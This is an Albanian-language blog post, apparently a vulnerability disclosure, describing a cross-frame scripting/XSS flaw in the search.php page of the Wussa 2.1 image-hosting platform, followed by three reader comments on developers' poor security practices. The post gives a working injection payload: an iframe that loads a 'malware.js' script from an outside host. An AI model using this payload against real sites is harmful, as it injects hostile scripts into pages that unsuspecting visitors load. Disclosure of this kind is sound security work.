Wussa 2.1 vulnerabilitet Cross frame scripting.

Zakonisht nuk merrem me keto gjera, e sidomos me studimin e nje platforme qe as me ka rene rasti ta perdor..
Isha thjesht duke pare galerine e imazheve te nje mikut tim te cilin tani e pershendes, dhe u bera kurioz per te testuar search.php te platformes “image hosting” qe kishte instaluar..
Eshte per te qeshur metoda e ketyre programatoreve (e kam fjalen per ata qe krijojn keto CMS-t) ne kontrollimin e inputeve dhe mbrojtjen nga sulme te lloit CSS, apo XSS siç i quajn tani..
Me vjen per te qeshur sepse kontrollojn vetem : <script>alert(‘CSS’);</script> dhe kujtojn se jane mbrojtur kunder sulmeve te tilla.. Nderkohe qe ka shume menyra manipulimi http://ha.ckers.org/xss.html

Mire spo e zagjasim shume, kalojm tek exploiti yne 0-day.
Te infektuar : Wussa 2.1 dhe versionet me te vogla
Prodhuesi : http://wussa.com/
Exploit : tek search.php shkruajm : <iframe src=www.webikeq.com/malware.js></iframe> dhe do te shikojm qe ne faqen qe do te krijohet do te shohim nje frame me te perfshire ndonje kod keqdashes..

Normalisht i dergova nje e-mail programatorit te saj, qe si zakonisht nuk dergojn pergjigje sepse jane shume krenar per te pranuar qe shesin prodhime difektoze..(dhe vura re qe tek webi i tij tek /demo thjesht ka bere nje manipulim por vulnerabilitetin nuk e ka rregulluar)
Gjithsesi nga lexuesit e albanianwizard.org kerkohet vetem qe te mos behet publik ky vulnerabilitet perpara se te nxjerrin version te ri ku ta kene rregulluar vulnerabilitetin ne fjale..
Nuk do te doja qe script kiddie-t te fillonin me avazet e tyre..
arditi.

3 thoughts on “Wussa 2.1 vulnerabilitet Cross frame scripting.

  1. Shume e çuditshme , akoma ska pergjigje nga autori i cili ka `rregulluar` vulnerabilitetin CSS :L
    SKLUSH :F

    Normalisht per efekt te proxy nuk shikohet egzekutimi i skriptit por nese e benie me browser te lire do te shikoni nje dritare me te shkruajtur “XSS”.

  2. Ah ardit iken ato kohe kur luanim me keto lloj gjerash, por prap kur shoh ndonje gje te tille me te vertete me kthehet perseri ajo deshira per tu rimare me keto gjera.. Sa per keto programatoret eshte vetem per te thene por si nuk u mesuan njehere qe te testojne si duhet produktet e tyre. Une mendoj se kjo gje ndodh, pasi ndoshta siguria informatike neper fakultete apo ne shkolla te ndryshme nenvleresohet akoma.

  3. Iken vertet, por me vjen per te qeshur tamam siç me vinte ne ato kohe kur edhe sot gjejm te njejtin profil programatori.
    -Nuk e pranojn qe kane mangesi
    -ME e keqja eshte se nuk pranojn as ti ndihmosh :(
    Keta i therrasin kokes vetem atehere kur smban me…
    I shesin dhe me lek dreqi e mori, te pakten te japin nje sherbim minimalisht te sigurt ..

Leave a Reply

Your email address will not be published. Required fields are marked *